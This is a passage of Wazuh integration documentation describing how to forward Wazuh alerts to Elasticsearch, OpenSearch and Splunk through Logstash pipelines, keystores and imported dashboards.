      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_PASSWORD
      

      Where ELASTICSEARCH_USERNAME and ELASTICSEARCH_PASSWORD are keys representing your Elasticsearch username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-elasticsearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-elasticsearch.conf
      
    2. Add the following configuration to the wazuh-elasticsearch.conf file. This sets the parameters required to run Logstash.

      input {
        file {
          id => "wazuh_alerts"
          codec => "json"
          start_position => "beginning"
          stat_interval => "1 second"
          path => "/var/ossec/logs/alerts/alerts.json"
          mode => "tail"
          ecs_compatibility => "disabled"
        }
      }
      
      output {
          elasticsearch {
               hosts => "<ELASTICSEARCH_ADDRESS>"
               index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
               user => '${ELASTICSEARCH_USERNAME}'
               password => '${ELASTICSEARCH_PASSWORD}'
               ssl => true
               cacert => "</PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem"
               template => "/etc/logstash/templates/wazuh.json"
               template_name => "wazuh"
               template_overwrite => true
          }
      }
      

      Where:

      • <ELASTICSEARCH_ADDRESS> is your Elasticsearch IP address.

      • </PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem is your Elasticsearch root certificate local path on the Wazuh server. For example, you can use /etc/logstash/elasticsearch-certs/root-ca.pem which is the Elasticsearch root certificate that was copied earlier.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "/PATH/TO/LOCAL/ELASTICSEARCH/root-ca.pem" with ssl_certificate_verification => false.

  4. By default the /var/ossec/logs/alerts/alerts.json file is owned by the wazuh user with restrictive permissions. You must add the logstash user to the wazuh group so it can read the file when running Logstash as a service:

    $ sudo usermod -a -G wazuh logstash
    
Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-elasticsearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the configuration files.

    Ensure that Wazuh server RESTful API port (55000) is open on your Wazuh server. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash.service
    $ sudo systemctl start logstash.service
    

Note

Any data indexed before the configuration is complete would not be forwarded to the Elastic indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events generated when Logstash runs. View this file in case you need to troubleshoot.

Check Elastic documentation for more details on setting up and running Logstash.

Configuring the Wazuh alerts index pattern in Elastic

In Kibana, do the following to create the index pattern name for the Wazuh alerts.

  1. Select > Management > Stack Management.

  2. Choose Kibana > Data Views and select Create data view.

  3. Enter a name for the data view and define wazuh-alerts-* as the index pattern name.

  4. Select timestamp in the Timestamp fields dropdown menu. Then Save data view to Kibana.

  5. Open the menu and select Discover under Analytics.

  6. Select > Analytics > Discover.

Verifying the integration

To check the integration with Elasticsearch, navigate to Discover in Kibana and verify that you can find the Wazuh security data with the data view name you entered.

Elastic dashboards

Wazuh provides several dashboards for Elastic Stack. After finishing with the Elasticsearch integration setup, these dashboards display your Wazuh alerts in Elastic.

Importing these dashboards defines the index pattern name wazuh-alerts-*. The index pattern name is necessary for creating index names and receiving the alerts. We recommend using wazuh-alerts-4.x-%{+YYYY.MM.dd}.

Follow the next steps to import the Wazuh dashboards for Elastic.

  1. Run the command below to download the Wazuh dashboard file for Elastic.

    • If you are accessing the Elastic dashboard (Kibana) from a Linux or macOS system:

      # wget https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-dashboards.ndjson
      
    • If you are accessing the Elastic dashboard (Kibana) from a Windows system, run the following command in Powershell:

      # Invoke-WebRequest -Uri "https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-dashboards.ndjson" -OutFile "allDashboards.ndjson"
      
  2. Navigate to Management > Stack management in Kibana.

  3. Click on Saved Objects and click Import.

  4. Click on the Import icon, browse your files, and select the dashboard file.

  5. Click the Import button to start importing.

  6. To find the imported dashboards, select Analytics > Dashboard.

OpenSearch integration

OpenSearch is a distributed, community-driven, Apache 2.0-licensed, 100% open source search and analytics suite used for a broad set of use cases like real-time application monitoring, log analytics, and website search. OpenSearch is a fork from Elasticsearch. They have many similarities in configuration and integration steps.

In this guide, you can find out how to integrate Wazuh with OpenSearch in the following ways:

Wazuh indexer integration using Logstash

Perform the steps below on your Logstash server. You must install Logstash on a dedicated server or on the server hosting the third-party indexer. We performed these steps on a Linux operating system. Logstash forwards the data from the Wazuh indexer to OpenSearch in the form of indexes.

Learn more about the Wazuh indexer integration and its necessary considerations.

Installing Logstash

Perform the following steps to install Logstash and the required plugins. Ensure your Logstash and OpenSearch versions are compatible.

  1. Follow the Elastic documentation to install Logstash.

  2. Install the logstash-input-opensearch plugin and the logstash-output-opensearch plugin using the following command. These plugins allow reading the data from the Wazuh indexer into the Logstash pipeline and writing the data into OpenSearch.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch logstash-output-opensearch
    
  3. Copy the Wazuh indexer and OpenSearch root certificates on the Logstash server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/wazuh-indexer-certs and /etc/logstash/opensearch-certs respectively.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem
    $ sudo chmod -R 755 </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem and </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem with your Wazuh indexer and Opensearch certificate local path on the Logstash endpoint respectively.

Configuring new indexes

You must define the mappings between the data and the index types to ensure OpenSearch indexes your data correctly. OpenSearch can infer these mappings, but we recommend that you explicitly configure them. Wazuh provides a set of mappings to ensure OpenSearch indexes the data correctly.

You need to use the logstash/os_template.json template to configure this index initialization for your OpenSearch platform.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

# mkdir /etc/logstash/templates
# curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-template.json

In OpenSearch, the indexes support up to 1000 fields by default. However, Wazuh logs might contain even more than this number of fields. To solve this issue, the provided wazuh.json template has the fields set to 10000 by default as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data from the Wazuh indexes and send them to OpenSearch.

The Logstash pipeline requires access to the following secret values:

  • Wazuh indexer credentials

  • OpenSearch credentials

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of the Wazuh indexer and OpenSearch in the Logstash keystore.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    OPENSEARCH_USERNAME, OPENSEARCH_PASSWORD, WAZUH_INDEXER_USERNAME, and WAZUH_INDEXER_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your OpenSearch username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_PASSWORD
      
    3. Store your Wazuh indexer administrator username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_PASSWORD
      

    Where:

    • OPENSEARCH_USERNAME and OPENSEARCH_PASSWORD are keys representing your OpenSearch username and password respectively.

    • WAZUH_INDEXER_USERNAME and WAZUH_INDEXER_PASSWORD are keys representing your Wazuh indexer administrator username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-opensearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-opensearch.conf
      
    2. Add the following configuration to the wazuh-opensearch.conf file. This sets the parameters required to run Logstash.

      input {
        opensearch {
         hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
         user  =>  "${WAZUH_INDEXER_USERNAME}"
         password  =>  "${WAZUH_INDEXER_PASSWORD}"
         index =>  "wazuh-alerts-4.x-*"
         ssl => true
         ca_file => "</PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem"
         query =>  '{
             "query": {
                "range": {
                   "@timestamp": {
                      "gt": "now-1m"
                   }
                }
             }
         }'
         schedule => "* * * * *"
        }
      }
      
      output {
          opensearch {
            hosts => ["<OPENSEARCH_ADDRESS>"]
            auth_type => {
               type => 'basic'
               user => '${OPENSEARCH_USERNAME}'
               password => '${OPENSEARCH_PASSWORD}'
            }
            index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
            cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem"
            ssl => true
            template => "/etc/logstash/templates/wazuh.json"
            template_name => "wazuh"
            template_overwrite => true
            legacy_template => false
          }
      }
      

      Where:

      • <WAZUH_INDEXER_ADDRESS> is your Wazuh indexer address or addresses in case of cluster deployment.

      • <OPENSEARCH_ADDRESS> is your OpenSearch address.

      • </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem is your Wazuh indexer certificate local path on the Wazuh server. For example, you can use /etc/logstash/wazuh-indexer-certs/root-ca.pem which is the Wazuh indexer root certificate that was copied earlier.

      • </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem is your OpenSearch certificate local path on the Wazuh server. For example, you can use /etc/logstash/opensearch-certs/root-ca.pem which is the OpenSearch certificate that was copied earlier.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem" with ssl_certificate_verification => false.

      If you aren't using composable index templates and the _index_template API, remove the legacy_template => false parameter.

Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-opensearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the Logstash executable, the pipeline, and the configuration files.

    Ensure that Wazuh indexer RESTful API port (9200) is open on your Wazuh indexer. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete would not be forwarded to the OpenSearch indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events produced when Logstash runs. View this file in case you need to troubleshoot.

After Logstash is successfully running, check how to configure the Wazuh alert index pattern and verify the integration.

Wazuh server integration using Logstash

Perform all the steps below on your Wazuh server. Learn more about the Wazuh server integration and its necessary considerations.

Installing Logstash

We use Logstash to forward security data in the /var/ossec/logs/alerts/alerts.json alerts file from the Wazuh server to the OpenSearch indexes.

Perform the following steps to install Logstash and the required plugin.

  1. Follow the Elastic documentation to install Logstash on the Wazuh server.

  2. Run the following command to install the logstash-output-opensearch plugin. This plugin allows Logstash to write the data into OpenSearch.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-output-opensearch
    
  3. Copy the OpenSearch root certificate to the Wazuh server. You can add the certificate to any directory of your choice. In our case, we add it in the /etc/logstash/opensearch-certs directory.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem with your OpenSearch certificate local path on the Wazuh server.

Configuring new indexes

You must define the mappings between the data and the index types to ensure Opensearch indexes your data correctly. Opensearch can infer these mappings, but we recommend that you explicitly configure them. Wazuh provides a set of mappings to ensure Opensearch indexes the data correctly.

You need to use the logstash/os_template.json template to configure this index initialization for your Opensearch platform. The refresh_interval is set to 5s in the template we provide.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

# mkdir /etc/logstash/templates
# curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-template.json

In OpenSearch, the indexes support up to 1000 fields by default. However, Wazuh logs might contain even more than this number of fields. To solve this issue, the provided wazuh.json template has the fields set to 10000 by default as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data in the Wazuh /var/ossec/logs/alerts/alerts.json alerts file and send them to OpenSearch.

The Logstash pipeline requires access to your OpenSearch credentials.

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of OpenSearch.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    OPENSEARCH_USERNAME and OPENSEARCH_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your OpenSearch username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_PASSWORD
      

      Where OPENSEARCH_USERNAME and OPENSEARCH_PASSWORD are keys representing your OpenSearch username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-opensearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-opensearch.conf
      
    2. Add the following configuration to the wazuh-opensearch.conf file. This sets the parameters required to run Logstash.

      input {
        file {
          id => "wazuh_alerts"
          codec => "json"
          start_position => "beginning"
          stat_interval => "1 second"
          path => "/var/ossec/logs/alerts/alerts.json"
          mode => "tail"
          ecs_compatibility => "disabled"
        }
      }
      
      output {
          opensearch {
            hosts => ["<OPENSEARCH_ADDRESS>"]
            auth_type => {
               type => 'basic'
               user => '${OPENSEARCH_USERNAME}'
               password => '${OPENSEARCH_PASSWORD}'
            }
            index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
            cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem"
            ssl => true
            template => "/etc/logstash/templates/wazuh.json"
            template_name => "wazuh"
            template_overwrite => true
            legacy_template => false
          }
      }
      

      Where:

      • <OPENSEARCH_ADDRESS> is your OpenSearch IP address.

      • </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem is your OpenSearch certificate local path on the Wazuh server. In our case, we used /etc/logstash/opensearch-certs/root-ca.pem.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem" with ssl_certificate_verification => false.

      If you aren't using composable index templates and the _index_template API, remove the legacy_template => false parameter.

  4. By default the /var/ossec/logs/alerts/alerts.json file is owned by the wazuh user with restrictive permissions. You must add the logstash user to the wazuh group so it can read the file when running Logstash as a service:

    $ sudo usermod -a -G wazuh logstash
    
Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-opensearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the configuration files.

    Ensure that Wazuh server RESTful API port (55000) is open on your Wazuh server. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Note

Any data indexed before the configuration is complete would not be forwarded to the OpenSearch indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events generated when Logstash runs. View this file in case you need to troubleshoot.

Check Elastic documentation for more details on setting up and running Logstash.

Configuring the Wazuh alerts index pattern in OpenSearch

In Opensearch Dashboards, do the following to create the index pattern name for the Wazuh alerts.

  1. Select > Management > Dashboards Management.

  2. Choose Index Patterns and select Create index pattern.

  3. Define wazuh-alerts-* as the index pattern name.

  4. Select timestamp as the primary time field for use with the global time filter. Then Create the index pattern.

  5. Open the menu and select Discover under OpenSearch Dashboards.

Verifying the integration

To check the integration with OpenSearch, navigate to Discover in OpenSearch Dashboards and verify that you can find the Wazuh security data within the index pattern wazuh-alerts-4.x*.

OpenSearch dashboards

Wazuh provides several dashboards for OpenSearch. After finishing with the OpenSearch integration setup, these dashboards display your Wazuh alerts in OpenSearch.

Importing these dashboards defines the index pattern name wazuh-alerts-*. The index pattern name is necessary for creating index names and receiving alerts.

Follow the next steps to import the Wazuh dashboards for OpenSearch.

  1. Run the command below to download the Wazuh dashboard file for OpenSearch.

    1. If you are accessing the OpenSearch dashboard from a Linux or macOS system:

      # wget https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-dashboards.ndjson
      
    2. If you are accessing the Opensearch dashboard from a Windows system (run the command using Powershell):

      # Invoke-WebRequest -Uri "https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-dashboards.ndjson" -OutFile "allDashboards.ndjson"
      
  2. In OpenSearch Dashboards, navigate to Management > Dashboards management.

  3. Click on Saved Objects and click Import.

  4. Click on the Import icon, browse your files, and select the dashboard file.

  5. Click the Import button to start importing then click Done.

  6. To find the imported dashboards, navigate to Dashboard under OpenSearch Dashboards.

Splunk integration

Splunk is a security platform that enables you to collect, search, analyze, visualize, and report real-time and historical data. Splunk indexes the data stream and parses it into a series of individual events that you can view and search.

Splunk users connect to Splunk through the command-line interface or through Splunk Web to administer their deployment. Splunk enables users to also manage, create knowledge objects, run searches, and create pivots and reports.

Wazuh integrates with Splunk in these ways:

Wazuh indexer integration using Logstash

Before configuring Logstash, you need to set up the Splunk indexer to receive the forwarded events. Learn more about the Wazuh indexer integration and its necessary considerations.

Configuring the Splunk indexer

To complete the integration from the Wazuh indexer to Splunk, you must first configure Splunk to:

  • Enable the HTTP Event Collector.

  • Define the wazuh-alerts Splunk index to store your logs.

  • Create your Event Collector token.

Check the Splunk set up and use HTTP Event Collector documentation to set up the configuration, as seen below.

Installing Logstash

You must install Logstash on a dedicated server or on the server hosting the third-party indexer.

Perform the following steps on your Logstash server to set up your forwarder.

  1. Follow the Elastic documentation to install Logstash. Ensure that you consider the requirements and performance tuning guidelines for running Logstash.

  2. Run the following command to install the logstash-input-opensearch plugin. This plugin reads data from the Wazuh indexer into the Logstash pipeline.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
    
  3. Copy the Wazuh indexer and Splunk root certificates to the Logstash server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/wazuh-indexer-certs and /etc/logstash/splunk-certs respectively.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem
    $ sudo chmod -R 755 </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem
    

    Replace </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem and </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem with your Wazuh indexer and Splunk certificate local paths on the Logstash endpoint respectively.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data from the Wazuh indexes and send them to Splunk.

The Logstash pipeline requires access to the following secret values:

  • Wazuh indexer credentials

  • Splunk Event Collector token

To securely store these values, you can use the Logstash keystore.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"' | sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store these values. When prompted, input your own values as follows:

    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_USERNAME
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_PASSWORD
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add SPLUNK_AUTH
    

    Where:

    • WAZUH_INDEXER_USERNAME and WAZUH_INDEXER_PASSWORD are keys representing your Wazuh indexer administrator username and password respectively.

    • SPLUNK_AUTH is your Splunk Event Collector token.

Perform the following steps to configure the Logstash pipeline.

  1. Create the configuration file wazuh-splunk.conf in /etc/logstash/conf.d/ directory.

    $ sudo touch /etc/logstash/conf.d/wazuh-splunk.conf
    
  2. Edit the file and add the following configuration. This sets the parameters required to run Logstash.

    input {
      opensearch {
       hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
       user  =>  "${WAZUH_INDEXER_USERNAME}"
       password  =>  "${WAZUH_INDEXER_PASSWORD}"
       index =>  "wazuh-alerts-4.x-*"
       ssl => true
       ca_file => "</PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem"
       query =>  '{
           "query": {
              "range": {
                 "@timestamp": {
                    "gt": "now-1m"
                 }
              }
           }
       }'
       schedule => "* * * * *"
      }
    }
    output {
       http {
          format => "json" # format of forwarded logs
          http_method => "post" # HTTP method used to forward logs
          url => "<SPLUNK_URL>:8088/services/collector/raw" # endpoint to forward logs to
          headers => ["Authorization", "Splunk ${SPLUNK_AUTH}"]
          cacert => "</PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem"
       }
    }
    

    Where:

    • <WAZUH_INDEXER_ADDRESS> is your Wazuh indexer address or addresses in case of cluster deployment.

    • <SPLUNK_URL> is your Splunk URL.

    • </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem is your Wazuh indexer certificate local path on the Logstash server. In our case we used /etc/logstash/wazuh-indexer-certs/root-ca.pem.

    • </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem is your Splunk certificate local path on the Logstash server. In our case, we used /etc/logstash/splunk-certs/ca.pem.

    Note

    For testing purposes, you can avoid SSL verification by replacing the line cacert => "/PATH/TO/LOCAL/SPLUNK/ca.pem" with ssl_verification_mode => "none".

Running Logstash
  1. Once you have everything set, start Logstash from the command line with its configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-splunk.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the settings files.

    Ensure that Wazuh indexer RESTful API port (9200) is open on your Wazuh indexer. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete would not be forwarded to the Splunk indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance has logs that you can check in case something fails.

After Logstash is successfully running, check how to verify the integration.

Wazuh server integration using Logstash

Before configuring Logstash, you need to set up the Splunk indexer to receive the forwarded events. Learn more about the Wazuh server integration and its necessary considerations.

Configuring Splunk indexer

First, set up Splunk as follows:

  • Enable HTTP Event Collector.

  • Define the wazuh-alerts Splunk index to store your logs.

  • Create your Event Collector token.

Check the Splunk set up and use HTTP Event Collector documentation to achieve this.

Installing Logstash

Logstash must forward the data from the Wazuh server to the Splunk indexes created previously.

  1. Follow the Elastic documentation to install Logstash on the same system as the Wazuh server.

  2. Copy the Splunk root certificates to the Wazuh server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/splunk-certs.

  3. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem
    

    Replace </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem with your Splunk certificate local path on the Wazuh server.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data in the Wazuh /var/ossec/logs/alerts/alerts.json alerts file and send them to Splunk.

The Logstash pipeline requires access to your Splunk Event Collector Token.

To securely store these values, you can use the Logstash keystore.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store these values. When prompted, input your own values. Where SPLUNK_AUTH is your Splunk Event Collector token.

    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add SPLUNK_AUTH
    

Configuring the pipeline with the Tail mode and the JSON codec for the file input plugin allows Logstash to read the Wazuh alerts file.

To configure the Logstash pipeline do the following.

  1. Copy the Splunk root certificates to the Wazuh server. You can add the certificate to any directory of your choice. In our case, we add it in the /etc/logstash/splunk-certs directory.

  2. Create the configuration file wazuh-splunk.conf in /etc/logstash/conf.d/ directory:

    $ sudo touch /etc/logstash/conf.d/wazuh-splunk.conf
    
  3. Edit the wazuh-splunk.conf file and add the following configuration. This sets the parameters required to run logstash.

    input {
      file {
        id => "wazuh_alerts"
        codec => "json"
        start_position => "beginning"
        stat_interval => "1 second"
        path => "/var/ossec/logs/alerts/alerts.json"
        mode => "tail"
        ecs_compatibility => "disabled"
      }
    }
    output {
       http {
          format => "json" # format of forwarded logs
          http_method => "post" # HTTP method used to <SPLUNK_URL>forward logs
          url => "<SPLUNK_URL>:8088/services/collector/raw" # endpoint to forward logs to
          headers => ["Authorization", "Splunk ${SPLUNK_AUTH}"]
          cacert => "</PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem"
       }
    }
    

    Where:

    • <SPLUNK_URL> is your Splunk URL.

    • </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem is your Splunk certificate local path on the Logstash server. In our case we used /etc/logstash/splunk-certs/ca.pem.

    Note

    For testing purposes, you can avoid SSL verification by replacing the line cacert => "</PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem" with ssl_verification_mode => "none".

  4. By default, the /var/ossec/logs/alerts/alerts.json file is owned by the wazuh user with restrictive permissions. You must add the logstash user to the wazuh group so it can read the file when running Logstash as a service:

    $ sudo usermod -a -G wazuh logstash
    
Running Logstash
  1. Once you have everything set, start Logstash with its configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-splunk.conf --path.settings /etc/logstash/
    

